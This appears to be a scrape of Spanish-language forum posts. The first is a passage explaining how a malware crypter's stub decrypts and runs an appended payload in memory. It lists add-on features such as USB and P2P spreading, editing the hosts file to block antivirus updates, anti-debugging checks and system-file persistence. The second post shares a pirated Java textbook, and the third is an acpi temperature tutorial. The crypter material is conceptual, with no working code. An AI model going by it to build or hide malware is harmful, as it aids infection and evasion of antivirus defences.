Aquí es donde entra a funcionar el stub, este tambien es un fichero ejecutable, suele funcionar con un código similar a este pseudocódigo:
-Busco mi ruta
-Leo todo mi código
-Ejecuto en memoria todo lo que hay debajo de mi.

Como se puede observar si ejecutamos este fichero, no pasará nada, pues por si solo es completamente inofensivo. Un crypter nos mezclará el código obtenido antes en base64 y pondrá encima de dicho código el stub. El código finalmente quedaría:
-Busco mi ruta (ej: c:\bichito_encriptado.exe)
-Leo todo mi código: Rutinas varias para ejecutar código, des-encriptar, etc.
-Ejecuto en memoria el código des-encriptado: "bGluZWEgcXVlIGhhY2UgdG9kbyBlbCBtYWw=".

El stub... Un poco más a fondo.
Tal y como se ha podido ver, una gran parte del trabajo lo tendrá el stub. Para el programador, es el que más juego puede proporcionar pues se le pueden añadir tantas rutinas como se quiera. Es decir, podriamos meter todo lo necesario para tener un fichero con nuestro código virico, pero no solo eso, si no a su vez que este se replicase por usb por ejemplo. Cosas que se me ocurren podrian ser:
-Replicacion de usb.
-Replicacion por programas de P2P.
-Modificar el fichero host. Para esquivar actualización de los Av.
-Añadir rutinas que imposibiliten o dificulten el analisis. Is debugger present, anti-anubis....
-Crear un nuevo proceso, para asi poder mostrar que la aplicacion funciona y no un simple mensaje de error...
-Modificar algún fichero de sistema o varios, ej: Salvapantallas para que pueda cargar nuestro amigo, taskmngr,explorer,firefox...

Por supuesto cuantas más opciones más fácil será detectarlo, pues facilitas las firmas a las compañias AV, si detectan ejecución en memoria, más leer fichero... blanco y en botella.


NOTA IMPORTANTE: Toda esta información es para aquellos que os dedicais al analisis, detección, programación, por hobby o por trabajo. Nunca deberá ser utilizada para cometer maldades... Sobra recordar que ir infectando máquinas por ahí es un delito y tiene penas de prisión.
#119
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como Programar en Java - 7ma Edición Español [H. DEITEL &amp; P. DEITEL]
Español | 10 Mb | Pdf | Páginas: 1432 | Pass: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descripción:
Esta nueva edición del libro de texto sobre Java más utilizado en el mundo emplea un método anticipado para las clases y objetos. Incluye también una cobertura completa de la programación orientada a objetos en Java, para lo cual presenta varios ejemplos prácticos integrados: la clase Tiempo, la clase Empleado, la clase Libro Calificaciones, un ejemplo práctico opcional de DOO/UML2 con el ATM, el ejemplo práctico opcional de GUI y gráficos, un libro de direcciones controlado por base de datos y dos aplicaciones Web multinivel controladas por bases de datos: una libreta de direcciones que utiliza controles JSF habilitados para AJAR para mostrar un nombre y una dirección en un Mapa de Google, y un sistema de reservaciones de una aerolínea que utiliza servicios Web.



Contenido:
Capítulo 1: Introducción las computadoras, Internet y Web.
Capítulo 2: Introducción a las aplicaciones en Java.
Capítulo 3: Introducción a las clases y los objetos.
Capítulo 4: Instrucciones de control: parte 1.
Capítulo 5: Instrucciones de control: parte 2.
Capítulo 6: Métodos: un análisis más detallado.
Capítulo 7: Arreglos.
Capítulo 8: Clases y objetos: un análisis más detallado.
Capítulo 9: Programación orienta a objetos: herencia.
Capítulo 10: Programación orientada a objetos: poliformismo.
Capítulo 11: Componentes la GUI: parte 1.
Capítulo 12: Gráficos Java 2D.
Capítulo 13: Manejo de excepciones.
Capítulo 14: Archivos y flujos.
Capítulo 15: Recursividad.
Capítulo 16: Búsqueda ordenamiento.
Capítulo 17: Estructuras de datos.
Capítulo 18: Genéricos.
Capítulo 19: Colecciones.
Capítulo 20: Introducción a los applets de Java.
Capítulo 21: Multimedia: applets y aplicaciones.
Capítulo 22: Componenetes de la GUI: parte 2.
Capítulo 23: Subprocesamiento múltiple.
Capítulo 24: Redes.
Capítulo 25: Acceso a bases datos con JDBC.
Capítulo 26: Aplicaciones Web: parte 1.
Capítulo 27: Aplicaciones Web: parte 2.
Capítulo 28: Servicios Web JAX-WS, Web 2.0 y Mash-ups.
Capítulo 29: Salida con formato.
Capítulo 30: Cadenas, caracteres y expresiones regulares.
Apéndice A: Tabla de precedencia de los operadores.
Apéndice B: Conjunto de caracteres ASCII.
Apéndice C: Palabras clave y palabras reservadas.
Apéndice D: Tipos primitivos.
Apéndice E: Sistemas numéricos.
Apéndice F: Group Layou.
Apéndice G: Componentes e integración Java Desktop (JDIC).
Apéndice H: Masus Índice.


Espero les sea Útil!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#120
Llega el verano y como siempre me toca estar pendiente de las temperaturas de mi portátil. Aunque lo suelo tener bien refrigerado, de vez en cuando me gusta dar un vistazo a las temperaturas ya que a veces lo tengo encendido muchas horas.
Para tener controlados estos valores tenemos varias herramientas que leen los sensores de nuestro pc y nos muestra mucha información, como puede ser No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o algunos applet de escritorio tipo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Estás opciones están muy bien, pero no me gusta tener un programa corriendo todo el tiempo, solo para saber las temperaturas, además, aunque en pequeña medida también colabora en ese calentamiento que quiero evitar.


Una buena solución para ordenadores portátiles (si lo soporta), es utilizar acpi que se encuentra en los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de la mayoría de las distribuciones.
Acpi, funciona desde nuestra terminal y con un solo comando podemos comprobar los diversos valores de nuestro sistema, como el estado de la batería y su temperatura, ventiladores, estado del/los procesadores, etc.


Primero tenemos que instalarlo con apt-get, yum, o lo que utilice tu distro. Para ejecutarlo solo tenemos que escribir acpi seguido de la opción adecuada:

  • -b Información de la batería

  • -i Información adicional de la batería

  • -a Información de corriente alterna

  • -c Información de los ventiladores

  • -t Información de temperaturas

  • -V Información de todos los dispositivos

  • -f Utiliza fahrenheit como unidad de temperatura

  • -k Utiliza kelvin

  • -h Muestra la ayuda

  • -v Muestra la versión

Solo queda otra función que debemos conocer, si añadimos watch antes de acpi -(lo que sea), nos mostrara los valores en tiempo real. Por ejemplo queremos monitorizar todos los dispositivos en tiempo real, pues tecleamos:
Citar

Código: php
watch acpi -V


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Solo algunos:
Citar

Código: php
watch acpi -b -c -t


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Para facilitaros la tarea, podéis No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que podríamos llamar "valores" y que solo con teclear esa palabra nos de toda la información.


Nota: Alguna de estas informaciones, ya las tenemos en /proc o /sys, por lo que con un cat al archivo adecuado también obtendremos esta información sin necesidad de instalar nada, pero acpi nos evita buscar.


Fuente: man acpi